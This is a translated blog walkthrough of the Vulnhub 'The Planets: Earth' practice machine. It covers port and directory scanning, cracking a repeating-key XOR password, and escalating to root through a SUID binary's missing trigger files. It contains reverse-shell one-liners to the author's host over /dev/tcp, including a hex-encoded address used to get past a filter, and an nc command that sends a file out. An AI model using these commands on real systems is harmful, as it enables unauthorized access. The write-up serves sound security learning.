Vulnhub target machine: THE PLANETS: EARTH
2022-06-25 19:13:00 【Czheisenberg】
THE PLANETS:EARTH
Preparation
Attacker: Kali
Target: THE PLANETS: EARTH, NAT, 192.168.91.0 network segment
Download link
[https://www.vulnhub.com/entry/the-planets-earth,755/]
Information gathering and exploitation
Host discovery
https://github.com/czheisenberg/MyCode/blob/master/Scan/scapy/ping.py

Scan the segment with the Python script above to find the target's IP address, as shown in the figure.
Port scanning
nmap -O -sV -p- -A 192.168.91.171 -oN earth_namp.txt
As shown in the figure, three ports are open: 22, 80 and 443; both 80 and 443 are served by Python 3.9.
HTTP and HTTPS
https://192.168.91.171/
As shown in the figure, opening the IP directly returns Bad Request (400). Now look at the nmap scan results:
Two DNS records are visible, so the hosts file has to be edited manually.
Windows: C:\Windows\System32\drivers\etc\hosts
Linux: /etc/hosts
ipconfig /flushdns
Flush the DNS cache.
The page can now be accessed normally:
https://earth.local/
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
https://terratest.earth.local/
Directory scanning
python3 dirsearch.py -u https://earth.local/
python3 dirsearch.py -u https://terratest.earth.local/
Visit them one by one.
https://earth.local/admin/login

From this page it can be seen that the site is built with Django.
Guess whether DEBUG mode is on: entering an arbitrary URL shows Not Found, which proves DEBUG mode is off.
https://terratest.earth.local/robots.txt
Since it is Django, there is a robots.txt. The entries ending in * have an unknown extension and cannot be visited; the last one, testingnotes.*, is guessed to have the suffix txt, and it contains the following:
https://terratest.earth.local/testingnotes.txt

Notes for testing the secure messaging system:
* Using XOR encryption as the algorithm; it should be as secure as the one used in RSA.
* Earth has confirmed they have received the messages we sent.
* testdata.txt is used to test the encryption.
* terra is the username used for the administrator portal.

To do:
* How can we safely send our monthly keys to Earth? Or should we change keys weekly?
* Different key lengths need to be tested to protect against brute force. How long should the key be?
* The messaging interface and the admin panel interface need improving; they are very basic at present.
https://terratest.earth.local/testdata.txt

Based on radiometric dating estimates and other evidence, the Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect the Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
From the above we learn the following:
1. terra is the administrator username.
2. XOR (exclusive or) is the operation used.
3. To decrypt, XOR the Previous Messages with testdata.txt.
4. It is a CTF-style puzzle.
Decode

```python
import binascii

# c: the hex ciphertext copied from the Previous Messages box (the full string is
# not reproduced on this page; paste it in place of the placeholder below)
c = "<hex ciphertext from the Previous Messages box>"
m = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
# hex-encode the plaintext so both operands can be treated as big integers
m = binascii.b2a_hex(m.encode("utf-8"))
# ciphertext XOR plaintext leaves only the repeating key stream
result = hex(int(c, 16) ^ int(m, 16))
print(result)
```

Output:
0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
Convert the hex to characters online:
https://www.sojson.com/hexadecimal.html
Result:
earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat
It is all repetitions of: earthclimatechangebad4humans
So we have the username and password:
Log in
terra:earthclimatechangebad4humans
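The same known-plaintext recovery, written as an added example rather than the walkthrough's own script: it XORs ciphertext and plaintext byte by byte (so leading zero bytes are not lost, which the int()-based one-liner can do), detects the shortest repeat period of the resulting key stream instead of eyeballing it, and then reuses the key to decrypt any other message. The plaintext and the key are the ones on this page; the sample ciphertext is constructed inside the script by encrypting that plaintext, because the hex from the Previous Messages box is not reproduced here.

```python
import binascii

# Plaintext of testdata.txt and the key this walkthrough recovers (both from the page)
PLAINTEXT = (
    "According to radiometric dating estimation and other evidence, Earth formed "
    "over 4.5 billion years ago. Within the first billion years of Earth's history, "
    "life appeared in the oceans and began to affect Earth's atmosphere and surface, "
    "leading to the proliferation of anaerobic and, later, aerobic organisms. Some "
    "geological evidence indicates that life may have arisen as early as 4.1 billion "
    "years ago."
)
KEY = b"earthclimatechangebad4humans"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key: the 'encryption' the testing notes describe."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def demo_ciphertext_hex() -> str:
    """Constructed sample ciphertext: PLAINTEXT encrypted with KEY, hex-encoded.
    It stands in for the hex string shown in the Previous Messages box."""
    return binascii.hexlify(xor_bytes(PLAINTEXT.encode("utf-8"), KEY)).decode("ascii")


def keystream_from_known_plaintext(ciphertext: bytes, plaintext: bytes) -> bytes:
    """ciphertext XOR plaintext gives the key stream back, byte by byte.
    Working on bytes keeps leading zero bytes that an int()-based XOR would drop."""
    n = min(len(ciphertext), len(plaintext))
    return bytes(c ^ p for c, p in zip(ciphertext[:n], plaintext[:n]))


def shortest_period(stream: bytes) -> int:
    """Smallest p such that stream repeats every p bytes (len(stream) if it never repeats)."""
    for p in range(1, len(stream)):
        if all(stream[i] == stream[i - p] for i in range(p, len(stream))):
            return p
    return len(stream)


def recover_key(ciphertext_hex: str, plaintext: str) -> str:
    """Known-plaintext attack on repeating-key XOR: return the key as text."""
    stream = keystream_from_known_plaintext(
        binascii.unhexlify(ciphertext_hex), plaintext.encode("utf-8")
    )
    return stream[: shortest_period(stream)].decode("utf-8", errors="replace")


def decrypt_hex(ciphertext_hex: str, key: str) -> str:
    """Decrypt another hex message (e.g. the other Previous Messages) with the recovered key."""
    plain = xor_bytes(binascii.unhexlify(ciphertext_hex), key.encode("utf-8"))
    return plain.decode("utf-8", errors="replace")


if __name__ == "__main__":
    ct = demo_ciphertext_hex()
    key = recover_key(ct, PLAINTEXT)
    print("recovered key:", key)
    print("round trip ok:", decrypt_hex(ct, key) == PLAINTEXT)
```

The period detection is what makes the notes' "how long should the key be?" question moot: with one known plaintext longer than twice the key, the whole key falls out regardless of its length, which is why repeating-key XOR is not "as secure as RSA".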


As shown in the figure, the login succeeds and we arrive at a command-execution interface.

Entering id;ls shows that we are the apache user and lists the contents of the root directory. According to the vulnhub description: There are two flags on the box: a user and root flag which include an md5 hash.
flag 1
There are two flags, one for user and one for root.
Entering find / -name "*flag*" finds the flag at /var/earth_web/user_flag.txt
As shown in the figure, we have the first flag. According to the description, the second flag is in root's directory, so we need to escalate to root privileges to view it.
getshell
bash -i >& /dev/tcp/172.31.160.47/4444 0>&1
As shown in the figure: remote connections are forbidden.
After reading a master's write-up, it says to convert the IP address to hexadecimal. Why exactly, I don't know; just copy it! Remember this trick.
bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1
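Why the second one-liner gets past a block that stopped the first is worth seeing from the filtering side. The following added example (not from the walkthrough) shows a filter that only understands dotted-decimal addresses next to a check that canonicalises each IPv4 literal before comparing: the hex-octet spelling is the same host, and a filter that does not normalise it never sees it. The two command strings in the demo are the ones from this page.

```python
import re

# A filter that only understands dotted-decimal addresses
NAIVE_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# An octet written either in decimal or as 0x-prefixed hex: the two spellings on this page
OCTET = r"(?:0[xX][0-9a-fA-F]{1,2}|\d{1,3})"
IPV4_ANY_SPELLING = re.compile(rf"(?<![\w.])(?:{OCTET}\.){{3}}{OCTET}(?![\w.])")


def octet_value(token: str) -> int:
    return int(token, 16) if token.lower().startswith("0x") else int(token, 10)


def canonical_ipv4(literal: str):
    """Return the dotted-decimal form of a literal, or None if an octet is out of range."""
    parts = [octet_value(t) for t in literal.split(".")]
    if any(p > 255 for p in parts):
        return None
    return ".".join(str(p) for p in parts)


def ipv4_literals(command: str) -> list:
    """Every IPv4 literal in a command string, normalised to dotted decimal."""
    found = []
    for m in IPV4_ANY_SPELLING.finditer(command):
        canon = canonical_ipv4(m.group(0))
        if canon is not None:
            found.append(canon)
    return found


def naive_filter_sees(command: str) -> bool:
    """What a dotted-decimal-only filter would match on."""
    return NAIVE_IPV4.search(command) is not None


def mentions_host(command: str, host: str) -> bool:
    """True if the command refers to host in any spelling handled above."""
    return host in ipv4_literals(command)


if __name__ == "__main__":
    # Constructed sample: the two reverse-shell one-liners from this walkthrough
    # (172.31.160.47 is the walkthrough's own attacker address)
    for cmd in (
        "bash -i >& /dev/tcp/172.31.160.47/4444 0>&1",
        "bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1",
    ):
        print(f"{cmd!r}: naive={naive_filter_sees(cmd)} canonical={ipv4_literals(cmd)}")
```

The lesson for the defending side is that string matching on a command or a URL is not a network control: an egress rule on the firewall sees 172.31.160.47 whichever way the shell spelled it, while a regex sees only the spelling it was written for.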
Good, got a shell. Next, privilege escalation; first, gather information.
cat /etc/passwd
As shown in the figure, only two users have /bin/bash: root and earth.
uname -a
Useless.
Try
SUID privilege escalation
find / -perm -u=s -type f 2>/dev/null
As shown in the figure, judging from the returned results, /usr/bin/reset_root is very likely to give root privileges.
Run it directly:
Check for reset triggers
Reset failed, all triggers do not exist
It fails, as expected.
It is impossible to debug on the target, so download the binary to Kali and debug it there; nc can be used to transfer the file.
First, on Kali (the receiver), start:
nc -l 5555 > reset_root
Then on the target (the sender), start:
nc 172.31.160.47 5555 < /usr/bin/reset_root
It completes instantly.
reset_root is now downloaded and ready to debug. Here is a new command to learn: strace.
If the command is not present, install it.
Before use, give reset_root execute permission:
chmod +x reset_root
strace ./reset_root
From the returned results we can see three No such file or directory entries:
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
Perhaps these three files do not exist on the target, so the run fails. Let's create the three files on the target. What should be in them? Nobody knows whether they need any content. First check whether the target has these three files; if not, create them and run again.
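What makes those three access() calls interesting is not that the files are missing but where they live. The following added example (not part of the walkthrough) parses strace output for access() lines, lists the paths that came back ENOENT, and flags the ones under directories every local user can write to: a setuid binary whose behaviour is switched by the existence of a file in /tmp or /dev/shm has handed that switch to every user on the box. The three strace lines are the ones from this page; the fourth line is a constructed success case for contrast.

```python
import re

# Constructed sample: the three lines the walkthrough gets from `strace ./reset_root`,
# plus one constructed success line for contrast.
STRACE_OUTPUT = """\
access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/passwd", R_OK) = 0
"""

# Matches an access() line as strace prints it (optionally with a [pid N] prefix from -f)
ACCESS_RE = re.compile(
    r'^(?:\[pid\s+\d+\]\s+)?access\("([^"]+)",\s*([A-Z_|]+)\)\s*=\s*(-?\d+)(?:\s+([A-Z]+))?'
)

# Directories where any local user can create files
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def parse_access_calls(text: str) -> list:
    """Parse access() lines into dicts: path, mode, return value, errno (None on success)."""
    calls = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            path, mode, ret, errno = m.groups()
            calls.append({"path": path, "mode": mode, "ret": int(ret), "errno": errno})
    return calls


def missing_paths(text: str) -> list:
    """Paths the program probed that did not exist (ENOENT)."""
    return [c["path"] for c in parse_access_calls(text) if c["errno"] == "ENOENT"]


def user_creatable_triggers(text: str) -> list:
    """Missing paths that sit in world-writable directories.
    A setuid program that changes behaviour when such a path exists lets
    any local user flip that behaviour, which is the weakness in reset_root."""
    return [p for p in missing_paths(text) if p.startswith(WORLD_WRITABLE_PREFIXES)]


if __name__ == "__main__":
    for p in user_creatable_triggers(STRACE_OUTPUT):
        print("trigger file controllable by any local user:", p)
```

On a real system the same parser is a quick way to audit any setuid binary found by the `find / -perm -u=s` step above: run it under strace, feed the output in, and anything that comes back from user_creatable_triggers deserves a closer look.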
As shown in the figure, they really do not exist; the strace command is awesome.
Create them, then run it again.
From the returned results: resetting root password to: Earth, so the root user's password has been changed to Earth.
Switch to root
As shown in the figure, it is now root.
flag 2

Summary:
- The difficulty lies in cracking the password: XOR the plaintext with the ciphertext to obtain the key.
- Newly learned: nc can be used to transfer files.
- Newly learned: the strace command, very powerful.
- bash -i >& /dev/tcp/0xac.0x1f.0xa0.0x2f/4444 0>&1: the IP address can be written in hexadecimal. Learned.